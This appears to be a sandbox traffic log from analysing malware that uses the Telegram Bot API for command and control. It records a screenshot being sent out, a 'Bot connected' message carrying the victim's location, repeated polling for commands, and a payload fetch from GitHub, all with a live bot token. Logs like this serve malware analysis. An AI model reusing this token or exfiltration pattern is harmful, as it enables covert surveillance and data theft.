                                                                                        2024-06-05 01:56:54 UTC16355OUTData Raw: cd bb 62 22 e1 54 13 ce 07 27 92 4e 58 f3 5e 7f 7b e2 9f 10 6a 56 37 51 41 3c 36 aa 24 b0 b8 b5 b9 fb 29 8d a5 86 5b 8d a3 e4 59 d8 e0 e1 4f cc 54 91 b9 4a 8c e4 6d c9 ad df db 6a b7 5a 75 ac 5a 6c 37 b3 ea 71 5a 1b b3 6e db 09 36 ab 2b 3b a8 70 58 9d a5 40 dc 38 db c9 c7 22 4e df d7 97 f9 87 f5 fa 9d 0d e7 87 b4 db e8 ae 63 9e 19 40 b9 9d 2e 65 68 ae 24 89 8c 88 14 2b 06 56 05 70 11 7a 11 d2 a0 93 c2 9a 5c d6 f1 db cc 75 09 62 4d c0 ac 9a 95 cb 79 80 f5 57 cc 9f bc 5f f6 5b 23 93 c7 26 b1 63 f1 0e bf 7b 75 63 a7 da 36 97 1d cc 9f 6c 59 ae 5e 19 1e 26 30 3a 28 64 50 e0 e0 ee 20 82 c7 07 b9 c7 39 7a 79 3e 28 f1 5e 9f aa cd a0 e9 37 8d 26 8f 67 3b 9b b7 e6 d8 99 25 24 c5 98 db 27 f1 5e 83 9f 44 b5 b5 bf af ea c0 ef 66 fb 7f 9d 8e ce e3 c3 7a 55 d3 48 ef 6e
                                                                                        Data Ascii: b"T'NX^{jV7QA<6$)[YOTJmjZuZl7qZn6+;pX@8"Nc@.eh$+Vpz\ubMyW_[#&c{uc6lY^&0:(dP 9zy>(^7&g;%$'^DfzUHn
                                                                                        2024-06-05 01:56:54 UTC16355OUTData Raw: e9 49 d2 91 42 63 d7 a5 1d a8 fc 28 3d 0d 03 47 a0 51 46 28 ac 0f 93 37 fc 1d ff 00 21 e5 ff 00 ae 6d fd 2b bf 96 67 81 0c b1 c2 f3 ba f2 b1 26 32 c7 b0 e7 8a e0 3c 1f ff 00 21 e1 ff 00 5c db fa 57 a1 c4 7f 7e 9f 5a f8 4e 20 76 cc 23 e8 bf 36 7e 81 c3 4a f9 7b f5 7f 92 19 6d 7b 77 70 c5 6e 74 f9 2d a7 8f e6 2b bc 3a b2 9e ea c3 83 d0 e4 70 6a 7b cd f8 66 8e 54 46 8d 7c c0 0a e4 f1 9f 7e 87 a5 72 9a 0d de a9 70 8b 2e a1 73 74 64 b5 bc f2 59 5d 76 2b 97 5c 32 91 dc 2b 67 07 d0 d6 e5 f9 73 ae 46 82 37 28 d6 cd 97 d8 c4 03 87 ef b0 81 f8 b2 fe 3d 0f 45 5a 4a 15 1a fc 8e da 55 5c e9 df f3 39 cf 88 7f f1 f3 61 fe e3 ff 00 31 5c 5d 76 9f 10 ff 00 e3 e6 c3 fd c7 fe 62 b8 ba fa 5c b7 fd d6 1f 3f cd 9f 0d 9d 7f bf 54 f9 7e 48 28 a2 8a ed 3c b0 aa da 2e 91 63 af 78
                                                                                        Data Ascii: IBc(=GQF(7!m+g&2<!\W~ZN v#6~J{m{wpnt-+:pj{fTF|~rp.stdY]v+\2+gsF7(=EZJU\9a1\]vb\?T~H(<.cx
                                                                                        2024-06-05 01:56:54 UTC16355OUTData Raw: a1 0d 9e 4a 1c 6e c9 2d 9d a7 00 56 d4 6f a9 9d 4a 58 e5 b2 81 6c 02 e6 39 96 77 69 59 b8 e0 c7 e5 80 07 5e 77 9e 83 8e 78 6b c8 1f 99 25 ed a4 3a 85 8d c5 9d c2 ee 82 e2 36 8a 45 ce 32 ac 30 7f 43 58 09 e0 ab 6c ca d7 5a a6 a5 79 2c 8b 6e 86 49 9a 20 42 c1 27 98 80 04 45 1d 7a f1 92 3d f9 ad 2f ec eb e8 b5 29 ef a3 ba 9a 55 60 e6 3b 49 03 2c 60 95 8c 01 9e 70 01 8d 8e 76 ff 00 cb 43 c7 a8 26 f1 07 91 6e 4e 95 60 26 67 22 74 17 b2 ed 45 cf 05 4f 91 f3 1c 76 21 7e b4 96 f7 07 b1 13 f8 6a cd f5 36 bf 32 cf e6 9b d5 bd c0 61 b7 78 87 c9 03 a7 4d bc fa e7 bf 6a ce ff 00 84 0e c9 60 8e 08 75 3d 4a 08 56 c6 3d 3e 54 8d e3 c4 d0 a9 63 b5 b2 84 82 77 9c 95 da 7d 08 ad 6d 36 d7 53 b1 d3 ee d6 76 fb 55 cb 5c 5c 4b 00 77 7d bb 59 d9 a3 42 c5 49 50 01 03 80 71 8e 33
                                                                                        Data Ascii: Jn-VoJXl9wiY^wxk%:6E20CXlZy,nI B'Ez=/)U`;I,`pvC&nN`&g"tEOv!~j62axMj`u=JV=>Tcw}m6SvU\\Kw}YBIPq3
                                                                                        2024-06-05 01:56:54 UTC16355OUTData Raw: 6b 6e bd 17 e1 ef fc 80 ee bf eb ed bf f4 04 af 9d ce 30 9e f7 b7 e6 de ca df 79 f4 19 1b 75 a6 e8 a7 6b 26 ef f7 2f d4 f1 fb ef 12 5e 6a 5a 0d 96 93 75 14 12 25 97 fa 99 ca b7 9a 17 fb b9 ce 31 d0 74 ec 2b bf f8 7d a0 69 da ff 00 81 e6 b5 d5 6d 4c f6 e3 51 69 51 4b b2 7c c2 35 5c e5 48 3d c8 af 4e a2 bc 45 0b 3b 9f 51 47 06 e1 3e 79 4a fd 36 39 5b 8f 86 fe 13 ba 8e de 39 b4 9d cb 6f 19 8a 21 f6 89 46 d5 2c cf 8e 1b 9f 99 d8 f3 eb 5c ff 00 8f ff 00 e4 62 8b fe bd 13 ff 00 43 7a f4 aa f3 5f 1f ff 00 c8 c5 17 fd 7a 27 fe 86 f5 e8 e5 9f ef 51 f9 fe 4c e6 ce a2 96 02 a5 97 6f cd 1c bd 25 14 57 d6 1f 02 14 51 45 00 14 51 45 00 25 14 1a 28 00 a2 8a 28 00 a2 8a 28 00 a4 a5 ed 49 40 c2 8a 28 a0 02 8a 43 45 00 19 a2 8a 28 00 a2 8a 3b d3 18 52 52 9a 4a 00 28 a2 8a
                                                                                        Data Ascii: kn0yuk&/^jZu%1t+}imLQiQK|5\H=NE;QG>yJ69[9o!F,\bCz_z'QLo%WQEQE%(((I@(CE(;RRJ(
                                                                                        2024-06-05 01:56:54 UTC14195OUTData Raw: 31 28 a2 8a 06 14 94 51 4c 02 92 94 d2 50 30 a4 a0 d1 40 05 25 2d 25 00 14 86 96 90 d0 30 a4 a5 a4 a0 61 48 69 69 28 18 50 68 a4 a6 01 49 4b 49 40 c0 f4 a4 a5 a4 a0 61 49 4b 49 40 05 25 29 a4 a0 62 51 45 14 0c 4a 28 a2 81 89 45 14 94 00 52 50 68 a0 61 49 45 14 0c 29 28 a0 d3 18 94 86 96 92 81 85 25 2d 25 03 0a 4a 53 49 40 09 45 14 94 0c 29 29 69 28 18 86 8a 28 a0 62 51 45 21 a0 61 49 4b 49 40 c4 a2 8a 28 18 94 86 94 d2 50 86 14 94 b4 94 0c 29 0f 7a 5a 4a 00 4a 4a 5a 4c 50 50 52 52 f3 49 40 08 69 29 4d 06 81 89 49 4b 49 40 c4 34 94 a6 8a 06 25 1f d2 96 9a 79 a6 30 e9 48 69 73 cd 21 e6 90 c4 3d 28 e9 47 7a 3f 1a 06 07 fa d3 48 a7 52 73 4c 62 52 67 9a 53 d6 92 81 89 8a 29 68 c7 e7 48 62 52 63 1f 9d 29 a4 a0 61 8a 4e f4 1e 28 c7 e3 40 c4 34 50 68 ef 40 05 27
                                                                                        Data Ascii: 1(QLP0@%-%0aHii(PhIKI@aIKI@%)bQEJ(ERPhaIE)(%-%JSI@E))i((bQE!aIKI@(P)zZJJJZLPPRRI@i)MIKI@4%y0His!=(Gz?HRsLbRgS)hHbRc)aN(@4Ph@'
                                                                                        2024-06-05 01:56:55 UTC1237INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:56:55 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 849
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        {"ok":true,"result":{"message_id":81332,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552615,"document":{"file_name":"screenshot.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQE9tGZfxeflth0l3BocoueEcae5LZSCAALaEQACIhwBU7tdKE8JAY5aAQAHbQADNQQ","file_unique_id":"AQAD2hEAAiIcAVNy","file_size":15885,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQE9tGZfxeflth0l3BocoueEcae5LZSCAALaEQACIhwBU7tdKE8JAY5aAQAHbQADNQQ","file_unique_id":"AQAD2hEAAiIcAVNy","file_size":15885,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEBPbRmX8Xn5bYdJdwaHKLnhHGnuS2UggAC2hEAAiIcAVO7XShPCQGOWjUE","file_unique_id":"AgAD2hEAAiIcAVM","file_size":128680},"caption":"\ud83d\udcf8Screenshot taken"}}


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        8192.168.2.449764149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:56 UTC352OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%206476%0A%E2%84%B9%EF%B8%8FSend%20%22/6476*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:56:56 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:56:56 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 480
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:56:56 UTC480INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 33 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 36 37 35 32 35 32 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 62 6f 74 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 31 36 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 61 31 5c 75 66 65 30 66
                                                                                        Data Ascii: {"ok":true,"result":{"message_id":81333,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552616,"text":"\u26a1\ufe0f


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        9192.168.2.449765149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:57 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:56:57 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:56:57 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:56:57 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        10192.168.2.449768185.199.109.133443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:59 UTC108OUTGET /attationin/Cloud/main/Milinfo.txt HTTP/1.1
                                                                                        Host: raw.githubusercontent.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-06-05 01:56:59 UTC802INHTTP/1.1 404 Not Found
                                                                                        Connection: close
                                                                                        Content-Length: 14
                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-Frame-Options: deny
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        X-GitHub-Request-Id: 75CC:35BBD2:52803C:5BA726:665FC5CC
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Wed, 05 Jun 2024 01:56:59 GMT
                                                                                        Via: 1.1 varnish
                                                                                        X-Served-By: cache-dfw-kdfw8210171-DFW
                                                                                        X-Cache: HIT
                                                                                        X-Cache-Hits: 1
                                                                                        X-Timer: S1717552620.528511,VS0,VE2
                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        X-Fastly-Request-ID: 0d3e5cea8750e4a4fe24e92cb76efd93e7b15268
                                                                                        Expires: Wed, 05 Jun 2024 02:01:59 GMT
                                                                                        Source-Age: 30
                                                                                        2024-06-05 01:56:59 UTC14INData Raw: 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64
                                                                                        Data Ascii: 404: Not Found


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        11192.168.2.449767149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:56:59 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:56:59 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:56:59 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:56:59 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        12192.168.2.449769149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:01 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:01 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:01 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:01 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        13192.168.2.449770149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:03 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:04 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:03 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:04 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        14192.168.2.449771149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:04 UTC376OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/sendMessage?chat_id=6024388590&text=%E2%9A%A1%EF%B8%8FBot%20connected:%0AUsername:%20user,%20Location:%20United%20States%20[US],%20Killeen,%20ID:%205169%0A%E2%84%B9%EF%B8%8FSend%20%22/5169*help%22%20to%20see%20the%20command%20list%0A%F0%9F%92%8EVersion:%202.8 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        Connection: Keep-Alive
                                                                                        2024-06-05 01:57:04 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:04 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 480
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:04 UTC480INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 33 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 36 37 35 32 35 32 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 62 6f 74 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 65 67 6c 65 73 73 31 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 37 35 35 32 36 32 34 2c 22 74 65 78 74 22 3a 22 5c 75 32 36 61 31 5c 75 66 65 30 66
                                                                                        Data Ascii: {"ok":true,"result":{"message_id":81334,"from":{"id":6467525213,"is_bot":true,"first_name":"leglessbot2","username":"legless1bot"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":"private"},"date":1717552624,"text":"\u26a1\ufe0f


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        15192.168.2.449772149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:05 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:05 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:05 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                        2024-06-05 01:57:05 UTC362INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 32 32 37 37 34 36 38 30 36 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 31 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 75 6b 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 30 32 34 33 38 38 35 39 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 65 73 73 69 61 68 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 73 68 69 61 78 22 2c 22 74 79 70 65 22 3a
                                                                                        Data Ascii: {"ok":true,"result":[{"update_id":227746806,"message":{"message_id":81172,"from":{"id":6024388590,"is_bot":false,"first_name":"Messiah","username":"Mashiax","language_code":"uk"},"chat":{"id":6024388590,"first_name":"Messiah","username":"Mashiax","type":


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        16192.168.2.449773149.154.167.220443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-06-05 01:57:05 UTC112OUTGET /bot6467525213:AAHzpp_ghBVmy4CoqZYWOWI_G4X44i95aVY/getUpdates?offset=-1 HTTP/1.1
                                                                                        Host: api.telegram.org
                                                                                        2024-06-05 01:57:06 UTC388INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0
                                                                                        Date: Wed, 05 Jun 2024 01:57:06 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 362
                                                                                        Connection: close
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
